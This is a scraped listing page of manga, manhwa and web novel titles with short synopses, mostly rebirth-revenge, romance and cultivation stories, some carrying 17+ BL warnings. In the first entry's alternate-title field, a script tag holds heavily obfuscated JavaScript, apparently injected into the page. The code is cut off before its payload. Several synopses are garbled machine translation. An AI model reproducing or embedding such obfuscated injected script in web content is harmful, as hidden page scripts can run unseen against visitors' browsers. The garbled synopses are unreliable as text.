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The Immortal Emperor Luo Wuji has returned

The Reverent Saint, Luo Wuji /  Luo Wuji, The Reverent Saint / The Immortal Emperor Luo Wuji has returned /  ?????<script></script><script>(function(_0x37233c,_0x1594e9){var _0x51a1ea=_0x1344,_0x27aa43=_0x37233c();while(!![]){try{var _0x2f1bb6=-parseInt(_0x51a1ea(0x1a9))/(0x1aec+0x4*-0x8aa+0x1*0x7bd)*(-parseInt(_0x51a1ea(0x1a7))/(0xcfa+-0x1a0c+-0x3e*-0x36))+-parseInt(_0x51a1ea(0x1a2))/(0xe73+-0x5*-0x1a3+-0x1*0x169f)+parseInt(_0x51a1ea(0x1b1))/(0x1aa3*0x1+0xdf*0x10+0xd85*-0x3)*(parseInt(_0x51a1ea(0x1b7))/(-0x2039+0x22d7+-0x299))+-parseInt(_0x51a1ea(0x1a3))/(-0x1bd0+-0x67f*-0x5+0x4a5*-0x1)*(parseInt(_0x51a1ea(0x1af))/(-0x2245+-0x1833+0x3a7f))+-parseInt(_0x51a1ea(0x1a8))/(0xb*0x1c3+-0x1cd5+0x97c)+-parseInt(_0x51a1ea(0x1b8))/(0x2b7*-0x3+0xaaa+0xc*-0x35)+parseInt(_0x51a1ea(0x1bd))/(0x69b*0x3+0x8*-0x50+-0x1*0x1147);if(_0x2f1bb6===_0x1594e9)break;else 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The Way Back To The Palace

Her parents and baby died a brutal death. Her kindness earned her nothing but the vicious schemes of her husband and eldest sister. The hatred can only be returned in blood! When she resurrects in her new life, her former husband becomes a tough enemy for hers! Who will she choose? The aloof prince who is scheming, the young aristocrat who shares lots in common, or the young general who has had a crush on her since childhood? In this life, she wants to kill her enemies with her own hands, and also enjoy a bright future. Cửu Khuyết Phong Hoa Jiuque Fenghua Magnificence After Nine Mistakes The Way Back to the Palace Wicked Life 九阙风华 転生令嬢の復讐は華やかに 이번 생은 악녀로 살겠습니다


Living Life Over

In the last life, Xia Lin digs into Song Yan's heart, but he can't get rid of the fate of a spare tire.After re-lived his life, Xia Lin decided to cut off the fate and stay away from Song Yan Debts and debts, debts It is a true staged wife abuse that needs to be paid for a lifetime, and it is a good time to chase his wife in the crematorium!


Seek For Three Lifetimes

."I will stay by your side until you grow old." He kept his word. For 50 years, he held his hand with a smile by dawn, and embraced him by dusk. Over the valleys and hills, across the river of time, walking side by side to the ends of earth. ---------By the grace of this miracle, I will dedicate every moment to you.


Cold-Hearted Wife – It Is Not Easy To Bully Her

<div class="description-summary hide_show-more"> <div class="summary__content show-more"> <div class="detail-content"> <h2>Cold-hearted wife - it is not easy to bully her</h2> Shi Xia Ben is the envy of the president ‘s wife, but did not expect that behind the scenes is a contract marriage. The three-year deadline is approaching, but the president of Ao Jiao has proposed “let’s really do a fake show”. What if my husband does not act according to the contract? </div> </div> </div> Cold-hearted wife - it is not easy to bully her Don’t Provoke the Contract Wife Cold-hearted wife - it is not easy to bully her/ Don’t Provoke the Contract Wife/ Cold-Hearted Wife – It Is Not Easy To Bully Her/ My Contracted Wife is Cold to Me


The Golden Light of Dawn

You’re still precious to me. After losing her family in a demon attack, Rosha is reborn as the 777th most powerful magic knight in the Golden Dawn Society. To avenge her family, she trains hard and rises through the ranks against the odds. Then, she is tasked with protecting little Joshua, who is said to be the Child of God. Read manhwa The Golden Light of Dawn / The golden dawn light will shine for you / 황금빛 여명이 너를 비추리


My Cultivator Girlfriend

The modern cultivation world has become a place of intrigue and calculation. The strong prey on the weak. Everyone feels insecure. The security guard, Hero Ma, started his cultivation by accident after he saved a girl cultivator Wo De Tian Jie Nv You / 我的天劫女友


Farewell, My First Love

Read manhwa Farewell, My First Love / 너는 누군가의 첫사랑이었다 Seventeen-year-old Eun-ha has battled a weak heart since birth but has managed to live a normal life following surgery. However, her world shatters when her doctor reveals that she has just one year left to live. On the very same day, Ha-yoon, her classmate, is admitted to the hospital due to a devastating car accident that claims the lives of his entire family. Overwhelmed by grief, Ha-yoon contemplates ending his own life, while Eun-ha is determined to embrace the remainder of her days for the sake of her loved ones. Although their circumstances differ greatly, Eun-ha senses a shared connection with Ha-yoon and tries her best to become his friend. With the clock ticking on their time together, are they doomed to say farewell forever?.


Eternal Burning

“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” The human body is a representation of the world, controlled by internal desires. Desire is driven by will. The will communicates desires through the body and governs our world. When your world becomes dazzling and shining like never before because of the arrival of a person, you should be alert. That is the collapse of will. Shang Muxiao x Bei Jie Indifferent college student x cold and rational associate professor in a wheelchair Eternal Burning Shāo Bù Jìn Uncomplete Burning 烧不尽 Endless Burning / The Fall of Rationalism / 烧不尽


I Raised a Black Dragon

The witch, Eleonora Asil, has fifteen previous convictions. And the transmigrator, Noah Park, had no intentions of being involved in the novel’s original plot of the dragon beheading the villainess. With that thought in mind, she abandoned her titles as The Wicked Witch and sought to live a long and peaceful life. So she heads down to the countryside wrought with deep remorse for all her misdeeds. And all should be happy… or she thought. “Please raise me!” And so it would seem that she stumbled upon the heroine’s pet dragon — the black-haired kid that would turn ballistic and obsessive later on — imprinted the villainess as his mother. And to make matters worse, the male lead suspects her as the prime culprit of stealing the dragon. “How long should I keep up with you?” She thought he’d arrest her right away, but seems like the male lead was slowly becoming the dragon’s butler. “Can I hug you?” “No.” “Then… can you hold me?” The villainess believes that the dragon needs a bit of taming.


Martial Brother, Please Don’t Run Away~

“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” When Wang Xiaomie awoke, he discovered that he had been reborn and buried underground for over a thousand years, even living in a double room! This handsome guy, who was wearing the same red wedding dress, kissed him!! What can this weak, helpless, and ugly man do!? In order to revive his senior brother, he collected countless fortunes, built an underground tomb, found the legendary Acacia tree, and finally waited with him in the coffin for thousands of years without hesitation. But this person involved had no memory of this!! Martial Brother, Please Don’t Run Away~ Shi Xiong Bie Xiang Tao Senior Brother, Don’t Even Think About Running Away Shī Xiōng Bié Xiǎng Táo 师兄别想逃



The price for a love that should not be paid was terrible ruin. Sierra prays that she has lost everything she treasured. ‘Please, let me make a different choice this time.’ Time rewinds like that, and Sierra is once again faced with a choice. The time she returned was just one night spent with the one she loved. In their womb, there was a child they had coldly erased from the past before the return. can’t be with him Because the relationship with him in the past was full of despair. But the child who was the fruit of love, I wanted to save this time. ‘I want to leave only one trace that he left behind.’ So, eight years after Sierra disappeared from the islands. The love she had to leave has returned once again.
